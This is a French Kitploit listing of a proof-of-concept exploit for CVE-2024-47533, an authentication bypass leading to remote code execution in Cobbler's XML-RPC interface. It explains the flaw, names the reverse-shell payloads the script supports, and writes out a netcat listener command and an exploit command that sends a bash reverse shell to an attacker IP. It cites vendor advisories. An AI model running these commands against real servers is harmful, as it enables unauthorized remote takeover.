Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-47533-Cobbler-XMLRPC-Authentication-Bypass-RCE-Exploit-POC — CVE-2024-47533 est une vulnérabilité critique de contournement de l'authentification dans Cobbler (versions 3.0.0 à avant 3.2.3 et 3.3.7) permettant l'exécution de code à distance sans authentification via l'interface XMLRPC. | Kitploit
Outils/GitHubGitHub/dollarboysushil/cve-2024-47533-cobbler-xmlrpc-authentication-bypass-rce-exploit-poc
Authentification et AutorisationGénération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à Distance

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHubdollarboysushil/cve-2024-47533-cobbler-xmlrpc-authentication-bypass-rce-exploit-poc

CVE-2024-47533-Cobbler-XMLRPC-Authentication-Bypass-RCE-Exploit-POC

CVE-2024-47533 est une vulnérabilité critique de contournement de l'authentification dans Cobbler (versions 3.0.0 à avant 3.2.3 et 3.3.7) permettant l'exécution de code à distance sans authentification via l'interface XMLRPC.

Voir le dépôtSite web
81il y a 1 anPas encore vérifié
Partager

CVE-2024-47533 - Exploit RCE par contournement d'authentification XMLRPC de Cobbler

⚠️ Exécution de code à distance critique via contournement d'authentification dans Cobbler
🛠️ Implémentation du PoC par @dollarboysushil


💡 Aperçu

Cobbler, un serveur d'installation Linux qui permet de configurer rapidement des environnements d'installation réseau, présente une vulnérabilité d'authentification dans les versions allant de 3.0.0 jusqu'à (mais sans inclure) 3.2.3 et 3.3.7. La fonction utils.get_shared_secret() renvoie toujours -1, ce qui permet à n'importe qui de se connecter à l'interface XML-RPC de Cobbler avec un nom d'utilisateur vide ('') et un mot de passe -1. Cela permet à un attaquant disposant d'un accès réseau de prendre le contrôle total du serveur Cobbler. La vulnérabilité est corrigée dans les versions 3.2.3 et 3.3.7.


🛠 Analyse technique

La vulnérabilité est causée par une gestion inappropriée du secret partagé dans la fonction utils.get_shared_secret(), qui renvoie toujours -1, contournant ainsi l'authentification. Cela permet à tout utilisateur réseau de se connecter à l'interface XMLRPC de Cobbler avec des identifiants vides et d'exécuter des commandes arbitraires.


🔥 Point de terminaison vulnérable

http://<target>:25151/ — Point de terminaison API XMLRPC de Cobbler


💥 Exemples de charges utiles

Le script d'exploitation prend en charge diverses charges utiles de shell inverse, notamment :

  • Shell inverse Bash
  • Shells Netcat (nc, nc2)
  • Shell inverse Python
  • Téléchargement et exécution via Curl

🔬 Démonstration de la preuve de concept (PoC)

📡 Préparation de l'auditeur

Démarrez un auditeur Netcat sur votre machine :

root@kitploit:~
nc -lvnp 4444

auditeur netcat

🚀 Lancement de l'exploit

Exécutez le script d'exploitation CVE-2024-47533-dbs.py.

root@kitploit:~
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

CVE-2024-47533-dbs.py

💻 Accès au shell distant réussi

En cas d'exécution réussie, le shell inverse se reconnectera à l'auditeur, accordant à l'attaquant un accès distant au serveur.

Shell inverse réussi

📝 Références

  • Avis de sécurité SUSE pour CVE-2024-47533
  • Avis de sécurité GitHub GHSA-m26c-fcgh-cp6h
  • Base de données des vulnérabilités Snyk : SNYK-PYTHON-COBBLER-8384360
Télécharger l’outil